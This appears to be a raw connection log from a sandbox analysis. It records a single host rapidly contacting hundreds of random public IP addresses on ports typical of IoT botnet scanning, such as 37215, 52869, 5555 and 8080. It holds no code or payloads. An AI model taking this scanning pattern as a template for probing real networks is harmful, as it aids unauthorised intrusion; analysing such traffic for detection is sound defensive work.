                                                                  Nov 28, 2024 07:27:58.779905081 CET6049852869192.168.2.2368.101.86.227
                                                                  Nov 28, 2024 07:27:58.780560970 CET5034237215192.168.2.2383.88.254.107
                                                                  Nov 28, 2024 07:27:58.781213045 CET4726652869192.168.2.233.111.24.133
                                                                  Nov 28, 2024 07:27:58.781843901 CET3469852869192.168.2.23124.127.132.57
                                                                  Nov 28, 2024 07:27:58.782495975 CET5016481192.168.2.231.186.33.126
                                                                  Nov 28, 2024 07:27:58.783126116 CET5300680192.168.2.23180.158.189.190
                                                                  Nov 28, 2024 07:27:58.783763885 CET5436049152192.168.2.23220.234.56.30
                                                                  Nov 28, 2024 07:27:58.784394979 CET5928880192.168.2.2365.249.14.155
                                                                  Nov 28, 2024 07:27:58.785023928 CET365988080192.168.2.23152.206.32.137
                                                                  Nov 28, 2024 07:27:58.785670042 CET6026852869192.168.2.23128.39.179.200
                                                                  Nov 28, 2024 07:27:58.786293030 CET493828080192.168.2.2394.141.19.222
                                                                  Nov 28, 2024 07:27:58.786928892 CET4657880192.168.2.23165.106.2.118
                                                                  Nov 28, 2024 07:27:58.787858963 CET4087281192.168.2.23186.13.210.162
                                                                  Nov 28, 2024 07:27:58.788515091 CET440948443192.168.2.23192.174.160.226
                                                                  Nov 28, 2024 07:27:58.789160013 CET5878837215192.168.2.23151.95.79.143
                                                                  Nov 28, 2024 07:27:58.789757967 CET3755881192.168.2.2362.73.130.24
                                                                  Nov 28, 2024 07:27:58.790400982 CET5061452869192.168.2.23215.230.56.175
                                                                  Nov 28, 2024 07:27:58.791026115 CET3665280192.168.2.2365.241.205.91
                                                                  Nov 28, 2024 07:27:58.791670084 CET5096649152192.168.2.23202.214.164.77
                                                                  Nov 28, 2024 07:27:58.792298079 CET4804480192.168.2.23193.149.60.69
                                                                  Nov 28, 2024 07:27:58.793003082 CET3452652869192.168.2.2368.169.46.188
                                                                  Nov 28, 2024 07:27:58.793634892 CET446165555192.168.2.23222.239.189.68
                                                                  Nov 28, 2024 07:27:58.794308901 CET3629652869192.168.2.2324.168.141.210
                                                                  Nov 28, 2024 07:27:58.794915915 CET564027574192.168.2.2345.49.121.237
                                                                  Nov 28, 2024 07:27:58.795515060 CET493887574192.168.2.23157.116.73.7
                                                                  Nov 28, 2024 07:27:58.796128988 CET3660680192.168.2.2312.244.152.154
                                                                  Nov 28, 2024 07:27:58.796737909 CET4627652869192.168.2.2360.61.74.47
                                                                  Nov 28, 2024 07:27:58.797362089 CET386265555192.168.2.23137.6.145.87
                                                                  Nov 28, 2024 07:27:58.797986984 CET3468681192.168.2.231.162.198.242
                                                                  Nov 28, 2024 07:27:58.798624992 CET3576637215192.168.2.2391.91.58.110
                                                                  Nov 28, 2024 07:27:58.799273014 CET4398652869192.168.2.2385.206.232.118
                                                                  Nov 28, 2024 07:27:58.799890041 CET597947574192.168.2.2345.90.89.27
                                                                  Nov 28, 2024 07:27:58.800538063 CET3861852869192.168.2.23126.210.97.150
                                                                  Nov 28, 2024 07:27:58.801168919 CET5197680192.168.2.2328.36.92.242
                                                                  Nov 28, 2024 07:27:58.801810980 CET343748080192.168.2.23212.60.199.113
                                                                  Nov 28, 2024 07:27:58.802428007 CET5987480192.168.2.23108.136.248.79
                                                                  Nov 28, 2024 07:27:58.803041935 CET5759080192.168.2.23118.79.188.67
                                                                  Nov 28, 2024 07:27:58.803670883 CET3417880192.168.2.2315.238.152.127
                                                                  Nov 28, 2024 07:27:58.804305077 CET547927574192.168.2.23114.177.103.150
                                                                  Nov 28, 2024 07:27:58.804930925 CET5529449152192.168.2.2399.219.59.203
                                                                  Nov 28, 2024 07:27:58.805572033 CET490308080192.168.2.239.179.110.111
                                                                  Nov 28, 2024 07:27:58.806175947 CET344728080192.168.2.2389.109.61.141
                                                                  Nov 28, 2024 07:27:58.806792974 CET607145555192.168.2.23207.79.150.234
                                                                  Nov 28, 2024 07:27:58.808403015 CET361228080192.168.2.2314.204.207.237
                                                                  Nov 28, 2024 07:27:58.809706926 CET396208080192.168.2.23165.207.49.112
                                                                  Nov 28, 2024 07:27:58.810370922 CET366328443192.168.2.23121.14.239.14
                                                                  Nov 28, 2024 07:27:58.810996056 CET5256049152192.168.2.23153.118.180.181
                                                                  Nov 28, 2024 07:27:58.811614037 CET442387574192.168.2.23197.179.152.198
                                                                  Nov 28, 2024 07:27:58.812210083 CET5355481192.168.2.23159.157.115.126
                                                                  Nov 28, 2024 07:27:58.812786102 CET4887080192.168.2.23129.46.212.84
                                                                  Nov 28, 2024 07:27:58.813455105 CET400205555192.168.2.23173.220.217.199
                                                                  Nov 28, 2024 07:27:58.814063072 CET507148080192.168.2.23122.1.248.27
                                                                  Nov 28, 2024 07:27:58.814106941 CET42836443192.168.2.2391.189.91.43
                                                                  Nov 28, 2024 07:27:58.814728975 CET4532880192.168.2.23215.15.148.253
                                                                  Nov 28, 2024 07:27:58.815392971 CET3970637215192.168.2.23152.127.1.190
                                                                  Nov 28, 2024 07:27:58.816032887 CET561488080192.168.2.2316.160.29.25
                                                                  Nov 28, 2024 07:27:58.816668034 CET331928080192.168.2.2325.76.24.63
                                                                  Nov 28, 2024 07:27:58.817390919 CET550068080192.168.2.23163.122.132.187
                                                                  Nov 28, 2024 07:27:58.818027020 CET4306680192.168.2.23120.122.201.49
                                                                  Nov 28, 2024 07:27:58.818648100 CET346548080192.168.2.2337.67.31.21
                                                                  Nov 28, 2024 07:27:58.819307089 CET336188080192.168.2.23177.71.61.161
                                                                  Nov 28, 2024 07:27:58.834479094 CET4432249152192.168.2.2354.197.126.116
                                                                  Nov 28, 2024 07:27:58.835103989 CET5666437215192.168.2.23165.72.140.124
                                                                  Nov 28, 2024 07:27:58.835704088 CET3772237215192.168.2.2352.160.156.2
                                                                  Nov 28, 2024 07:27:58.836313009 CET6060280192.168.2.23110.101.87.191
                                                                  Nov 28, 2024 07:27:58.836927891 CET5250649152192.168.2.23170.254.161.26
                                                                  Nov 28, 2024 07:27:58.837543011 CET4035280192.168.2.23221.124.199.74
                                                                  Nov 28, 2024 07:27:58.838141918 CET3562852869192.168.2.23178.233.21.105
                                                                  Nov 28, 2024 07:27:58.838761091 CET481127574192.168.2.23108.29.185.40
                                                                  Nov 28, 2024 07:27:58.839400053 CET607788443192.168.2.2365.64.113.148
                                                                  Nov 28, 2024 07:27:58.840024948 CET427507574192.168.2.23114.220.234.17
                                                                  Nov 28, 2024 07:27:58.840646029 CET361167574192.168.2.233.195.8.90
                                                                  Nov 28, 2024 07:27:58.841253042 CET4436680192.168.2.2319.106.226.188
                                                                  Nov 28, 2024 07:27:58.841881037 CET4698880192.168.2.23157.96.102.17
                                                                  Nov 28, 2024 07:27:58.842344999 CET804522211.190.108.117192.168.2.23
                                                                  Nov 28, 2024 07:27:58.842416048 CET4522280192.168.2.2311.190.108.117
                                                                  Nov 28, 2024 07:27:58.842546940 CET6052080192.168.2.23142.69.196.141
                                                                  Nov 28, 2024 07:27:58.842994928 CET8038934140.221.39.242192.168.2.23
                                                                  Nov 28, 2024 07:27:58.843034029 CET3893480192.168.2.23140.221.39.242
                                                                  Nov 28, 2024 07:27:58.843179941 CET487688443192.168.2.23144.199.162.100
                                                                  Nov 28, 2024 07:27:58.843781948 CET470828080192.168.2.23103.107.221.247
                                                                  Nov 28, 2024 07:27:58.843903065 CET3721555170178.25.78.182192.168.2.23
                                                                  Nov 28, 2024 07:27:58.843941927 CET5517037215192.168.2.23178.25.78.182
                                                                  Nov 28, 2024 07:27:58.844423056 CET5705080192.168.2.23146.110.86.85
                                                                  Nov 28, 2024 07:27:58.844543934 CET80804420873.28.144.173192.168.2.23
                                                                  Nov 28, 2024 07:27:58.844597101 CET442088080192.168.2.2373.28.144.173
                                                                  Nov 28, 2024 07:27:58.845063925 CET5095080192.168.2.2358.130.138.131
                                                                  Nov 28, 2024 07:27:58.845233917 CET757433862113.94.133.170192.168.2.23
                                                                  Nov 28, 2024 07:27:58.845274925 CET338627574192.168.2.23113.94.133.170
                                                                  Nov 28, 2024 07:27:58.846177101 CET555557246119.215.99.156192.168.2.23
                                                                  Nov 28, 2024 07:27:58.846223116 CET572465555192.168.2.23119.215.99.156
                                                                  Nov 28, 2024 07:27:58.846329927 CET518228080192.168.2.23120.121.182.155
                                                                  Nov 28, 2024 07:27:58.846522093 CET84435047690.232.155.185192.168.2.23
                                                                  Nov 28, 2024 07:27:58.846564054 CET504768443192.168.2.2390.232.155.185
                                                                  Nov 28, 2024 07:27:58.847110987 CET5343437215192.168.2.23169.189.175.4
                                                                  Nov 28, 2024 07:27:58.847157955 CET844334956111.78.196.116192.168.2.23
                                                                  Nov 28, 2024 07:27:58.847199917 CET349568443192.168.2.23111.78.196.116
                                                                  Nov 28, 2024 07:27:58.847847939 CET3670237215192.168.2.2382.114.241.74
                                                                  Nov 28, 2024 07:27:58.847877979 CET55554265626.11.196.70192.168.2.23
                                                                  Nov 28, 2024 07:27:58.847923994 CET426565555192.168.2.2326.11.196.70
                                                                  Nov 28, 2024 07:27:58.848408937 CET528695338658.189.121.169192.168.2.23
                                                                  Nov 28, 2024 07:27:58.848458052 CET5338652869192.168.2.2358.189.121.169
                                                                  Nov 28, 2024 07:27:58.848592043 CET424668443192.168.2.2388.31.166.235
                                                                  Nov 28, 2024 07:27:58.849056005 CET8036630106.152.251.50192.168.2.23
                                                                  Nov 28, 2024 07:27:58.849093914 CET3663080192.168.2.23106.152.251.50
                                                                  Nov 28, 2024 07:27:58.849447012 CET462048080192.168.2.23153.97.17.195
                                                                  Nov 28, 2024 07:27:58.849755049 CET55553729035.200.178.13192.168.2.23
                                                                  Nov 28, 2024 07:27:58.849798918 CET372905555192.168.2.2335.200.178.13
                                                                  Nov 28, 2024 07:27:58.850295067 CET4857049152192.168.2.23123.86.59.14
                                                                  Nov 28, 2024 07:27:58.850372076 CET3721553460137.40.92.251192.168.2.23
                                                                  Nov 28, 2024 07:27:58.850413084 CET5346037215192.168.2.23137.40.92.251
                                                                  Nov 28, 2024 07:27:58.850940943 CET80805641218.82.236.106192.168.2.23
                                                                  Nov 28, 2024 07:27:58.850980043 CET564128080192.168.2.2318.82.236.106
                                                                  Nov 28, 2024 07:27:58.851016998 CET4454280192.168.2.23142.253.75.15
                                                                  Nov 28, 2024 07:27:58.851560116 CET8044434155.189.226.125192.168.2.23
                                                                  Nov 28, 2024 07:27:58.851607084 CET4443480192.168.2.23155.189.226.125
                                                                  Nov 28, 2024 07:27:58.851617098 CET4982081192.168.2.2371.247.65.155
                                                                  Nov 28, 2024 07:27:58.852210045 CET4015849152192.168.2.2374.42.253.221
                                                                  Nov 28, 2024 07:27:58.852247953 CET75745315232.54.226.30192.168.2.23
                                                                  Nov 28, 2024 07:27:58.852292061 CET531527574192.168.2.2332.54.226.30
                                                                  Nov 28, 2024 07:27:58.852783918 CET8049926175.88.224.26192.168.2.23
                                                                  Nov 28, 2024 07:27:58.852822065 CET4992680192.168.2.23175.88.224.26
                                                                  Nov 28, 2024 07:27:58.852855921 CET3596080192.168.2.23142.139.145.168
                                                                  Nov 28, 2024 07:27:58.853363037 CET5555466447.29.11.132192.168.2.23
                                                                  Nov 28, 2024 07:27:58.853432894 CET466445555192.168.2.237.29.11.132
                                                                  Nov 28, 2024 07:27:58.853481054 CET500948443192.168.2.234.167.134.165
                                                                  Nov 28, 2024 07:27:58.854022980 CET3721556416131.62.122.210192.168.2.23
                                                                  Nov 28, 2024 07:27:58.854057074 CET5641637215192.168.2.23131.62.122.210
                                                                  Nov 28, 2024 07:27:58.854094028 CET4341852869192.168.2.23132.20.246.253
                                                                  Nov 28, 2024 07:27:58.854557037 CET372153277070.172.81.219192.168.2.23
                                                                  Nov 28, 2024 07:27:58.854598045 CET3277037215192.168.2.2370.172.81.219
                                                                  Nov 28, 2024 07:27:58.854701996 CET3465881192.168.2.2311.77.239.14
                                                                  Nov 28, 2024 07:27:58.855345964 CET487265555192.168.2.23191.33.92.105
                                                                  Nov 28, 2024 07:27:58.855967045 CET3953852869192.168.2.23111.150.127.171
                                                                  Nov 28, 2024 07:27:58.856040955 CET75745678655.77.110.137192.168.2.23
                                                                  Nov 28, 2024 07:27:58.856081963 CET803426230.84.48.130192.168.2.23
                                                                  Nov 28, 2024 07:27:58.856084108 CET567867574192.168.2.2355.77.110.137
                                                                  Nov 28, 2024 07:27:58.856126070 CET3426280192.168.2.2330.84.48.130
                                                                  Nov 28, 2024 07:27:58.856436968 CET4915249462171.23.177.240192.168.2.23
                                                                  Nov 28, 2024 07:27:58.856473923 CET4946249152192.168.2.23171.23.177.240
                                                                  Nov 28, 2024 07:27:58.856592894 CET555728443192.168.2.2397.41.245.225
                                                                  Nov 28, 2024 07:27:58.857028008 CET803851416.1.9.146192.168.2.23
                                                                  Nov 28, 2024 07:27:58.857076883 CET3851480192.168.2.2316.1.9.146
                                                                  Nov 28, 2024 07:27:58.857234001 CET3337481192.168.2.2390.1.191.80
                                                                  Nov 28, 2024 07:27:58.857587099 CET55554246096.204.93.246192.168.2.23
                                                                  Nov 28, 2024 07:27:58.857625008 CET424605555192.168.2.2396.204.93.246
                                                                  Nov 28, 2024 07:27:58.857845068 CET536928080192.168.2.2367.203.48.57
                                                                  Nov 28, 2024 07:27:58.858225107 CET49152341586.205.85.158192.168.2.23
                                                                  Nov 28, 2024 07:27:58.858268976 CET3415849152192.168.2.236.205.85.158
                                                                  Nov 28, 2024 07:27:58.858464956 CET4965280192.168.2.2350.196.185.72
                                                                  Nov 28, 2024 07:27:58.858992100 CET8055714122.248.149.165192.168.2.23
                                                                  Nov 28, 2024 07:27:58.859035969 CET5571480192.168.2.23122.248.149.165
                                                                  Nov 28, 2024 07:27:58.859066010 CET3869080192.168.2.23177.200.207.58
                                                                  Nov 28, 2024 07:27:58.859685898 CET530108080192.168.2.2312.79.183.254
                                                                  Nov 28, 2024 07:27:58.859982967 CET8033160192.97.26.236192.168.2.23
                                                                  Nov 28, 2024 07:27:58.860024929 CET3316080192.168.2.23192.97.26.236
                                                                  Nov 28, 2024 07:27:58.860341072 CET574828080192.168.2.2343.138.7.234
                                                                  Nov 28, 2024 07:27:58.860955954 CET3765080192.168.2.23119.37.208.253
                                                                  Nov 28, 2024 07:27:58.860965967 CET844355426167.233.55.65192.168.2.23
                                                                  Nov 28, 2024 07:27:58.861005068 CET554268443192.168.2.23167.233.55.65
                                                                  Nov 28, 2024 07:27:58.861622095 CET808037036212.35.88.79192.168.2.23
                                                                  Nov 28, 2024 07:27:58.861645937 CET389008080192.168.2.23167.201.110.208
                                                                  Nov 28, 2024 07:27:58.861663103 CET370368080192.168.2.23212.35.88.79
                                                                  Nov 28, 2024 07:27:58.862318993 CET555087574192.168.2.23184.76.229.89
                                                                  Nov 28, 2024 07:27:58.862363100 CET55553459225.75.205.173192.168.2.23
                                                                  Nov 28, 2024 07:27:58.862402916 CET345925555192.168.2.2325.75.205.173
                                                                  Nov 28, 2024 07:27:58.862945080 CET5978249152192.168.2.232.144.168.159
                                                                  Nov 28, 2024 07:27:58.863034010 CET5286948832106.222.158.5192.168.2.23
                                                                  Nov 28, 2024 07:27:58.863073111 CET4883252869192.168.2.23106.222.158.5
                                                                  Nov 28, 2024 07:27:58.863581896 CET498788080192.168.2.23136.58.228.44
                                                                  Nov 28, 2024 07:27:58.863717079 CET8060128132.191.123.35192.168.2.23
                                                                  Nov 28, 2024 07:27:58.863750935 CET6012880192.168.2.23132.191.123.35
                                                                  Nov 28, 2024 07:27:58.864181042 CET584928080192.168.2.2381.241.101.2
                                                                  Nov 28, 2024 07:27:58.864382982 CET8056816107.227.55.144192.168.2.23
                                                                  Nov 28, 2024 07:27:58.864433050 CET5681680192.168.2.23107.227.55.144
                                                                  Nov 28, 2024 07:27:58.864787102 CET583068080192.168.2.23102.6.12.154
                                                                  Nov 28, 2024 07:27:58.865005970 CET8036922217.150.215.116192.168.2.23
                                                                  Nov 28, 2024 07:27:58.865040064 CET3692280192.168.2.23217.150.215.116
                                                                  Nov 28, 2024 07:27:58.865422964 CET4575680192.168.2.23164.224.234.30
                                                                  Nov 28, 2024 07:27:58.865793943 CET8045012137.62.189.193192.168.2.23
                                                                  Nov 28, 2024 07:27:58.865839958 CET4501280192.168.2.23137.62.189.193
                                                                  Nov 28, 2024 07:27:58.866044044 CET484228080192.168.2.2313.35.2.160
                                                                  Nov 28, 2024 07:27:58.866669893 CET329448080192.168.2.2399.104.75.94
                                                                  Nov 28, 2024 07:27:58.866955042 CET757441512209.219.134.7192.168.2.23
                                                                  Nov 28, 2024 07:27:58.867000103 CET415127574192.168.2.23209.219.134.7
                                                                  Nov 28, 2024 07:27:58.867302895 CET390088080192.168.2.2377.70.97.131
                                                                  Nov 28, 2024 07:27:58.867538929 CET808049896126.106.74.156192.168.2.23
                                                                  Nov 28, 2024 07:27:58.867573023 CET498968080192.168.2.23126.106.74.156
                                                                  Nov 28, 2024 07:27:58.867948055 CET5262480192.168.2.2352.116.215.210
                                                                  Nov 28, 2024 07:27:58.868144989 CET55554881059.230.90.160192.168.2.23
                                                                  Nov 28, 2024 07:27:58.868185997 CET488105555192.168.2.2359.230.90.160
                                                                  Nov 28, 2024 07:27:58.868572950 CET5069881192.168.2.2374.198.143.219
                                                                  Nov 28, 2024 07:27:58.868796110 CET8050024179.251.32.251192.168.2.23
                                                                  Nov 28, 2024 07:27:58.868845940 CET5002480192.168.2.23179.251.32.251
                                                                  Nov 28, 2024 07:27:58.869256020 CET3429852869192.168.2.2397.91.236.206
                                                                  Nov 28, 2024 07:27:58.869437933 CET8060514158.166.4.165192.168.2.23
                                                                  Nov 28, 2024 07:27:58.869486094 CET6051480192.168.2.23158.166.4.165
                                                                  Nov 28, 2024 07:27:58.869911909 CET3660881192.168.2.23204.245.153.171
                                                                  Nov 28, 2024 07:27:58.870170116 CET80805308868.228.150.77192.168.2.23
                                                                  Nov 28, 2024 07:27:58.870209932 CET530888080192.168.2.2368.228.150.77
                                                                  Nov 28, 2024 07:27:58.870615005 CET470688443192.168.2.2332.115.244.125
                                                                  Nov 28, 2024 07:27:58.870837927 CET804926255.92.215.83192.168.2.23
                                                                  Nov 28, 2024 07:27:58.870888948 CET4926280192.168.2.2355.92.215.83
                                                                  Nov 28, 2024 07:27:58.871279955 CET4488652869192.168.2.23101.189.50.38
                                                                  Nov 28, 2024 07:27:58.871464968 CET844360062153.58.49.72192.168.2.23
                                                                  Nov 28, 2024 07:27:58.871499062 CET600628443192.168.2.23153.58.49.72
                                                                  Nov 28, 2024 07:27:58.871932983 CET3968881192.168.2.23147.130.7.228
                                                                  Nov 28, 2024 07:27:58.872093916 CET808035598216.85.193.21192.168.2.23
                                                                  Nov 28, 2024 07:27:58.872143984 CET355988080192.168.2.23216.85.193.21
                                                                  Nov 28, 2024 07:27:58.872636080 CET4001849152192.168.2.23175.170.71.155
                                                                  Nov 28, 2024 07:27:58.872786999 CET757454916167.15.35.246192.168.2.23
                                                                  Nov 28, 2024 07:27:58.872832060 CET549167574192.168.2.23167.15.35.246
                                                                  Nov 28, 2024 07:27:58.873305082 CET4486280192.168.2.23214.89.56.229
                                                                  Nov 28, 2024 07:27:58.873373032 CET757452194134.224.138.24192.168.2.23
                                                                  Nov 28, 2024 07:27:58.873414040 CET521947574192.168.2.23134.224.138.24
                                                                  Nov 28, 2024 07:27:58.873964071 CET5136437215192.168.2.23192.160.128.9
                                                                  Nov 28, 2024 07:27:58.874126911 CET75744073631.23.54.208192.168.2.23
                                                                  Nov 28, 2024 07:27:58.874167919 CET407367574192.168.2.2331.23.54.208
                                                                  Nov 28, 2024 07:27:58.874624968 CET757454474170.93.179.178192.168.2.23
                                                                  Nov 28, 2024 07:27:58.874669075 CET544747574192.168.2.23170.93.179.178
                                                                  Nov 28, 2024 07:27:58.874685049 CET3531237215192.168.2.2384.108.181.121
                                                                  Nov 28, 2024 07:27:58.875322104 CET531588080192.168.2.2354.104.73.193
                                                                  Nov 28, 2024 07:27:58.875327110 CET555539080196.155.214.59192.168.2.23
                                                                  Nov 28, 2024 07:27:58.875386000 CET390805555192.168.2.23196.155.214.59
                                                                  Nov 28, 2024 07:27:58.875936985 CET80803787646.35.54.91192.168.2.23
                                                                  Nov 28, 2024 07:27:58.875972033 CET378768080192.168.2.2346.35.54.91
                                                                  Nov 28, 2024 07:27:58.875976086 CET354088080192.168.2.2361.123.81.243
                                                                  Nov 28, 2024 07:27:58.876502991 CET808043238126.156.202.140192.168.2.23
                                                                  Nov 28, 2024 07:27:58.876554966 CET432388080192.168.2.23126.156.202.140
                                                                  Nov 28, 2024 07:27:58.876640081 CET524327574192.168.2.23159.99.163.111
                                                                  Nov 28, 2024 07:27:58.877132893 CET8043916105.45.143.155192.168.2.23
                                                                  Nov 28, 2024 07:27:58.877175093 CET4391680192.168.2.23105.45.143.155
                                                                  Nov 28, 2024 07:27:58.877300024 CET4340237215192.168.2.2333.93.201.252
                                                                  Nov 28, 2024 07:27:58.877769947 CET5286956834152.0.87.200192.168.2.23
                                                                  Nov 28, 2024 07:27:58.877803087 CET5683452869192.168.2.23152.0.87.200
                                                                  Nov 28, 2024 07:27:58.877974033 CET340665555192.168.2.2364.173.83.170
                                                                  Nov 28, 2024 07:27:58.878500938 CET8032994198.44.152.160192.168.2.23
                                                                  Nov 28, 2024 07:27:58.878551006 CET3299480192.168.2.23198.44.152.160
                                                                  Nov 28, 2024 07:27:58.878612995 CET5608849152192.168.2.23186.96.78.186
                                                                  Nov 28, 2024 07:27:58.879082918 CET75744933475.31.109.126192.168.2.23
                                                                  Nov 28, 2024 07:27:58.879128933 CET493347574192.168.2.2375.31.109.126
                                                                  Nov 28, 2024 07:27:58.879260063 CET5229880192.168.2.23205.79.22.178
                                                                  Nov 28, 2024 07:27:58.879673958 CET555551128170.251.163.52192.168.2.23
                                                                  Nov 28, 2024 07:27:58.879715919 CET511285555192.168.2.23170.251.163.52
                                                                  Nov 28, 2024 07:27:58.879935026 CET596885555192.168.2.23166.249.145.160
                                                                  Nov 28, 2024 07:27:58.880278111 CET8036546217.237.6.188192.168.2.23
                                                                  Nov 28, 2024 07:27:58.880316019 CET3654680192.168.2.23217.237.6.188
                                                                  Nov 28, 2024 07:27:58.880594969 CET3760852869192.168.2.2373.230.184.19
                                                                  Nov 28, 2024 07:27:58.880995035 CET8080357649.31.4.141192.168.2.23
                                                                  Nov 28, 2024 07:27:58.881033897 CET357648080192.168.2.239.31.4.141
                                                                  Nov 28, 2024 07:27:58.881238937 CET3408680192.168.2.2375.89.77.206
                                                                  Nov 28, 2024 07:27:58.881702900 CET5286947196100.49.226.162192.168.2.23
                                                                  Nov 28, 2024 07:27:58.881742001 CET4719652869192.168.2.23100.49.226.162
                                                                  Nov 28, 2024 07:27:58.881895065 CET5066049152192.168.2.23114.117.212.4
                                                                  Nov 28, 2024 07:27:58.882544041 CET488465555192.168.2.23114.17.69.181
                                                                  Nov 28, 2024 07:27:58.883187056 CET6001081192.168.2.2349.64.3.244
                                                                  Nov 28, 2024 07:27:58.883858919 CET446708080192.168.2.23106.43.212.137
                                                                  Nov 28, 2024 07:27:58.884491920 CET5503049152192.168.2.2335.184.146.118
                                                                  Nov 28, 2024 07:27:58.885130882 CET3298080192.168.2.23122.187.139.190
                                                                  Nov 28, 2024 07:27:58.885759115 CET4906052869192.168.2.23121.95.76.250
                                                                  Nov 28, 2024 07:27:58.886409044 CET4936680192.168.2.23177.120.79.8
                                                                  Nov 28, 2024 07:27:58.887029886 CET5967437215192.168.2.238.189.90.201
                                                                  Nov 28, 2024 07:27:58.887712002 CET444485555192.168.2.23203.238.209.21
                                                                  Nov 28, 2024 07:27:58.888358116 CET5290049152192.168.2.23143.207.148.54
                                                                  Nov 28, 2024 07:27:58.888973951 CET3849680192.168.2.2331.195.52.61
                                                                  Nov 28, 2024 07:27:58.889585972 CET415648080192.168.2.2392.194.65.27
                                                                  Nov 28, 2024 07:27:58.890224934 CET435328443192.168.2.23153.64.107.165
                                                                  Nov 28, 2024 07:27:58.890830040 CET3860680192.168.2.23105.13.161.144
                                                                  Nov 28, 2024 07:27:58.891479969 CET4488680192.168.2.23177.77.86.253
                                                                  Nov 28, 2024 07:27:58.892124891 CET5218880192.168.2.23117.244.40.134
                                                                  Nov 28, 2024 07:27:58.892757893 CET601408443192.168.2.23210.126.43.16
                                                                  Nov 28, 2024 07:27:58.893388033 CET454227574192.168.2.23158.228.53.169
                                                                  Nov 28, 2024 07:27:58.894011021 CET4862649152192.168.2.23107.201.204.124
                                                                  Nov 28, 2024 07:27:58.894644022 CET4003880192.168.2.23201.195.59.217
                                                                  Nov 28, 2024 07:27:58.895291090 CET584628080192.168.2.23170.20.179.231
                                                                  Nov 28, 2024 07:27:58.895941019 CET5573280192.168.2.2327.105.227.249
                                                                  Nov 28, 2024 07:27:58.896569014 CET4565681192.168.2.23109.55.98.37
                                                                  Nov 28, 2024 07:27:58.897213936 CET547428080192.168.2.2356.59.56.49
                                                                  Nov 28, 2024 07:27:58.897870064 CET455967574192.168.2.23158.60.86.218
                                                                  Nov 28, 2024 07:27:58.898430109 CET8041996161.154.233.90192.168.2.23
                                                                  Nov 28, 2024 07:27:58.898477077 CET4199680192.168.2.23161.154.233.90
                                                                  Nov 28, 2024 07:27:58.898513079 CET438807574192.168.2.23191.213.172.77
                                                                  Nov 28, 2024 07:27:58.899156094 CET337488080192.168.2.2333.12.176.23
                                                                  Nov 28, 2024 07:27:58.899158955 CET844351090205.3.224.6192.168.2.23
                                                                  Nov 28, 2024 07:27:58.899209976 CET510908443192.168.2.23205.3.224.6
                                                                  Nov 28, 2024 07:27:58.899784088 CET528696049868.101.86.227192.168.2.23
                                                                  Nov 28, 2024 07:27:58.899818897 CET6049852869192.168.2.2368.101.86.227
                                                                  Nov 28, 2024 07:27:58.899853945 CET4395837215192.168.2.23128.118.97.120
                                                                  Nov 28, 2024 07:27:58.900420904 CET372155034283.88.254.107192.168.2.23
                                                                  Nov 28, 2024 07:27:58.900454998 CET5034237215192.168.2.2383.88.254.107
                                                                  Nov 28, 2024 07:27:58.900517941 CET3627680192.168.2.2379.128.124.157
                                                                  Nov 28, 2024 07:27:58.901047945 CET52869472663.111.24.133192.168.2.23
                                                                  Nov 28, 2024 07:27:58.901082039 CET4726652869192.168.2.233.111.24.133
                                                                  Nov 28, 2024 07:27:58.901192904 CET503328080192.168.2.23116.81.240.7
                                                                  Nov 28, 2024 07:27:58.901699066 CET5286934698124.127.132.57192.168.2.23
                                                                  Nov 28, 2024 07:27:58.901737928 CET3469852869192.168.2.23124.127.132.57
                                                                  Nov 28, 2024 07:27:58.901854038 CET3942849152192.168.2.23163.197.220.203
                                                                  Nov 28, 2024 07:27:58.902371883 CET81501641.186.33.126192.168.2.23
                                                                  Nov 28, 2024 07:27:58.902414083 CET5016481192.168.2.231.186.33.126
                                                                  Nov 28, 2024 07:27:58.902533054 CET483127574192.168.2.2338.198.165.69
                                                                  Nov 28, 2024 07:27:58.903003931 CET8053006180.158.189.190192.168.2.23
                                                                  Nov 28, 2024 07:27:58.903043985 CET5300680192.168.2.23180.158.189.190
                                                                  Nov 28, 2024 07:27:58.903203011 CET6060880192.168.2.2328.115.34.207
                                                                  Nov 28, 2024 07:27:58.903641939 CET4915254360220.234.56.30192.168.2.23
                                                                  Nov 28, 2024 07:27:58.903688908 CET5436049152192.168.2.23220.234.56.30
                                                                  Nov 28, 2024 07:27:58.903870106 CET3836680192.168.2.23156.208.190.13
                                                                  Nov 28, 2024 07:27:58.904259920 CET805928865.249.14.155192.168.2.23
                                                                  Nov 28, 2024 07:27:58.904299021 CET5928880192.168.2.2365.249.14.155
                                                                  Nov 28, 2024 07:27:58.904535055 CET4151837215192.168.2.23169.158.193.51
                                                                  Nov 28, 2024 07:27:58.904907942 CET808036598152.206.32.137192.168.2.23
                                                                  Nov 28, 2024 07:27:58.904937983 CET365988080192.168.2.23152.206.32.137
                                                                  Nov 28, 2024 07:27:58.905184984 CET474128080192.168.2.2328.196.179.23
                                                                  Nov 28, 2024 07:27:58.905565977 CET5286960268128.39.179.200192.168.2.23
                                                                  Nov 28, 2024 07:27:58.905605078 CET6026852869192.168.2.23128.39.179.200
                                                                  Nov 28, 2024 07:27:58.905841112 CET574548080192.168.2.23151.37.141.215
                                                                  Nov 28, 2024 07:27:58.906173944 CET80804938294.141.19.222192.168.2.23
                                                                  Nov 28, 2024 07:27:58.906210899 CET493828080192.168.2.2394.141.19.222
                                                                  Nov 28, 2024 07:27:58.906516075 CET401545555192.168.2.2399.216.95.166
                                                                  Nov 28, 2024 07:27:58.906830072 CET8046578165.106.2.118192.168.2.23
                                                                  Nov 28, 2024 07:27:58.906868935 CET4657880192.168.2.23165.106.2.118
                                                                  Nov 28, 2024 07:27:58.907198906 CET4019681192.168.2.2322.57.27.162
                                                                  Nov 28, 2024 07:27:58.907779932 CET8140872186.13.210.162192.168.2.23
                                                                  Nov 28, 2024 07:27:58.907820940 CET4087281192.168.2.23186.13.210.162
                                                                  Nov 28, 2024 07:27:58.907864094 CET4678480192.168.2.2397.137.41.211
                                                                  Nov 28, 2024 07:27:58.908365011 CET844344094192.174.160.226192.168.2.23
                                                                  Nov 28, 2024 07:27:58.908411026 CET440948443192.168.2.23192.174.160.226
                                                                  Nov 28, 2024 07:27:58.908520937 CET4511449152192.168.2.23171.119.20.118
                                                                  Nov 28, 2024 07:27:58.909029007 CET3721558788151.95.79.143192.168.2.23
                                                                  Nov 28, 2024 07:27:58.909068108 CET5878837215192.168.2.23151.95.79.143
                                                                  Nov 28, 2024 07:27:58.909219980 CET5942449152192.168.2.2336.64.74.203
                                                                  Nov 28, 2024 07:27:58.909617901 CET813755862.73.130.24192.168.2.23
                                                                  Nov 28, 2024 07:27:58.909655094 CET3755881192.168.2.2362.73.130.24
